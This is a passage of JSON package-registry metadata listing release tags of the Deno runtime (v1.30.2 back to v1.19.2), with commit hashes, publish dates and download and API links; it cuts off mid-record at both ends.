tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://re